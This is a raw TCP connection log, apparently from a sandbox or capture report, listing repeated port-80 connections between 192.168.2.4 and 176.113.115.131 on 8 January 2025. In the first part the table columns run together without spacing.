                                                    Jan 8, 2025 08:43:01.733891964 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.734025002 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.738773108 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:02.419342995 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:02.419395924 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.930053949 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.930367947 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.934998989 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:03.935060024 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.935139894 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:03.935195923 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.935311079 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.940135002 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:04.628889084 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:04.628948927 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.259907961 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.260176897 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.264858961 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.264919043 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.264957905 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.265022039 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.265182018 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.269922018 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.970510960 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.970566988 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.478696108 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.478971004 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.483678102 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:08.483721972 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.483745098 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:08.483803034 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.483939886 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.488661051 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:09.181086063 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:09.181140900 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.806833029 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.807140112 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.811933041 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:10.811949968 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:10.812000036 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.812037945 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.812190056 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.816999912 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:11.501291037 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:11.501351118 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.010745049 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.011065006 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.017719030 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.017770052 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.017829895 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.017889023 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.018024921 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.025103092 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.708719969 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.708822012 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.338334084 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.338548899 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.343390942 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:15.343422890 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:15.343456984 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.343485117 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.343653917 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.348439932 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:16.047466993 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:16.047627926 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.558701038 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.559037924 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.566035986 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:17.566054106 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:17.566090107 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.566135883 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.566282988 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.572271109 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:18.273776054 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:18.273842096 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.902106047 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.902360916 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.907087088 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:19.907154083 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:19.907162905 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.907239914 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.907335043 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.912060976 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:20.603780031 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:20.603840113 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.119375944 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.119703054 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.124507904 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.124526024 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.124567032 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.124627113 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.124735117 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.129561901 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.831617117 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.831687927 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.464718103 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.465187073 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.469757080 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:24.469953060 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.470134020 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:24.470344067 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.470468044 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.475217104 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:25.156790018 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:25.156971931 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.668210030 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.668234110 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.673197985 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:26.673326969 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.673631907 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.678263903 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:26.678383112 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:26.678853035 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:27.388703108 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:27.388772964 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.009989977 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.010410070 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.015100956 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.015201092 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.020263910 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.020263910 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.020411015 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.025160074 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.707614899 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.707674980 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.213639021 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.213643074 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.218669891 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.218775988 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.220284939 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.220285892 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.220406055 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.225238085 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.919856071 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.919920921 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.541714907 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.542052984 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.546845913 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:33.546869993 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:33.546897888 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.546948910 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.547056913 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.551897049 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:34.257252932 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:34.257354975 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.760250092 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.760590076 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.765239000 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:35.765295029 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.765794992 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:35.765866995 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.766031981 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.770744085 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:36.481360912 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:36.481427908 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.104466915 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.104794025 CET5609580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.109534979 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:38.109590054 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.109600067 CET8056095176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:38.109663010 CET5609580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.109870911 CET5609580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.114613056 CET8056095176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:38.793694973 CET8056095176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:38.798208952 CET5609580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:40.322866917 CET5610080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:40.322873116 CET5609580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:40.327759027 CET8056100176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:40.327950001 CET8056095176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:40.330337048 CET5610080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:40.330362082 CET5609580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:40.330431938 CET5610080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:40.335236073 CET8056100176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:41.037965059 CET8056100176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:41.038223982 CET5610080192.168.2.4176.113.115.131
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 8, 2025 08:43:42.666486979 CET  56100        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:42.666856050 CET  56101        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:42.671699047 CET  80           56101      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:42.671809912 CET  56101        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:42.671935081 CET  56101        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:42.676769972 CET  80           56101      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:42.678234100 CET  80           56100      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:42.678311110 CET  56100        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:43.362859011 CET  80           56101      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:43.362922907 CET  56101        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:44.869683027 CET  56101        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:44.869687080 CET  56102        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:44.874568939 CET  80           56102      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:44.874732018 CET  56102        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:44.874752998 CET  80           56101      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:44.874779940 CET  56102        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:44.874826908 CET  56101        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:44.879514933 CET  80           56102      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:45.574013948 CET  80           56102      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:45.574084997 CET  56102        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:47.198338985 CET  56103        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:47.198350906 CET  56102        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:47.203346014 CET  80           56103      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:47.203536034 CET  80           56102      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:47.203804016 CET  56102        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:47.203805923 CET  56103        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:47.206691980 CET  56103        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:47.211437941 CET  80           56103      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:47.893065929 CET  80           56103      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:47.893153906 CET  56103        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:49.401343107 CET  56103        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:49.401747942 CET  56104        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:49.406575918 CET  80           56103      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:49.406591892 CET  80           56104      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:49.406634092 CET  56103        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:49.406667948 CET  56104        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:49.406824112 CET  56104        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:49.411643982 CET  80           56104      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:50.102644920 CET  80           56104      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:50.102710009 CET  56104        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:51.729053974 CET  56104        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:51.729381084 CET  56105        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:51.734143972 CET  80           56104      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:51.734177113 CET  80           56105      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:51.734220982 CET  56104        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:51.734271049 CET  56105        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:51.734407902 CET  56105        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:51.739214897 CET  80           56105      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:52.439913034 CET  80           56105      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:52.440022945 CET  56105        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:53.948973894 CET  56105        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:53.949347973 CET  56106        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:53.954150915 CET  80           56105      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:53.954199076 CET  80           56106      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:53.954211950 CET  56105        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:53.954273939 CET  56106        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:53.954473972 CET  56106        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:53.959254980 CET  80           56106      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:54.668608904 CET  80           56106      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:54.672605038 CET  56106        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:56.292098999 CET  56106        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:56.292499065 CET  56107        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:56.297282934 CET  80           56106      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:56.297333956 CET  56106        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:56.297365904 CET  80           56107      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:56.297430038 CET  56107        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:56.297605038 CET  56107        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:56.302362919 CET  80           56107      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:56.983952999 CET  80           56107      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:56.986675978 CET  56107        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:58.494457006 CET  56108        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:58.494457960 CET  56107        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:58.500474930 CET  80           56108      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:58.501789093 CET  80           56107      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:58.504313946 CET  56107        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:58.504314899 CET  56108        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:58.504410028 CET  56108        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:58.511131048 CET  80           56108      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:59.203466892 CET  80           56108      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:59.204324961 CET  56108        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:59.905312061 CET  56108        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:43:59.910597086 CET  80           56108      176.113.115.131  192.168.2.4
Jan 8, 2025 08:43:59.910654068 CET  56108        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:00.824271917 CET  56109        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:00.829139948 CET  80           56109      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:00.829252005 CET  56109        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:00.829441071 CET  56109        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:00.834198952 CET  80           56109      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:01.543853998 CET  80           56109      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:01.543914080 CET  56109        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:03.059019089 CET  56109        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:03.059559107 CET  56110        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:03.064034939 CET  80           56109      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:03.064196110 CET  56109        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:03.064403057 CET  80           56110      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:03.064562082 CET  56110        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:03.065023899 CET  56110        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:03.069834948 CET  80           56110      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:03.754291058 CET  80           56110      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:03.754350901 CET  56110        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:05.385919094 CET  56110        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:05.386369944 CET  56111        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:05.391040087 CET  80           56110      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:05.391098022 CET  56110        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:05.391141891 CET  80           56111      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:05.391225100 CET  56111        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:05.391397953 CET  56111        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:05.396193027 CET  80           56111      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:06.114204884 CET  80           56111      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:06.114289045 CET  56111        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:07.620210886 CET  56111        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:07.620719910 CET  56112        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:07.625344992 CET  80           56111      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:07.625399113 CET  56111        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:07.625524044 CET  80           56112      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:07.625586987 CET  56112        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:07.625771999 CET  56112        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:07.630559921 CET  80           56112      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:08.335683107 CET  80           56112      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:08.335762024 CET  56112        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:09.963886023 CET  56112        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:09.964303970 CET  56113        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:09.969042063 CET  80           56112      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:09.969088078 CET  80           56113      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:09.969094038 CET  56112        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:09.969157934 CET  56113        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:09.969321012 CET  56113        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:09.974097967 CET  80           56113      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:10.667959929 CET  80           56113      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:10.668378115 CET  56113        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:12.182859898 CET  56113        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:12.183237076 CET  56114        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:12.188064098 CET  80           56113      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:12.188082933 CET  80           56114      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:12.188119888 CET  56113        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:12.188162088 CET  56114        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:12.188338041 CET  56114        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:12.193082094 CET  80           56114      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:12.903877974 CET  80           56114      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:12.906478882 CET  56114        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:14.525783062 CET  56114        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:14.526171923 CET  56115        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:14.530975103 CET  80           56114      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:14.530997992 CET  80           56115      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:14.531102896 CET  56114        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:14.531105042 CET  56115        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:14.531332016 CET  56115        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:14.536149025 CET  80           56115      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:15.240238905 CET  80           56115      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:15.240328074 CET  56115        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:16.744716883 CET  56115        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:16.745129108 CET  56116        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:16.749819994 CET  80           56115      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:16.749902964 CET  80           56116      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:16.749927998 CET  56115        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:16.750086069 CET  56116        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:16.750243902 CET  56116        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:16.755016088 CET  80           56116      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:17.458482027 CET  80           56116      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:17.458559990 CET  56116        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:19.088140011 CET  56116        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:19.092277050 CET  56117        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:19.093497992 CET  80           56116      176.113.115.131  192.168.2.4
Jan 8, 2025 08:44:19.093565941 CET  56116        80         192.168.2.4      176.113.115.131
Jan 8, 2025 08:44:19.097142935 CET  80           56117      176.113.115.131  192.168.2.4
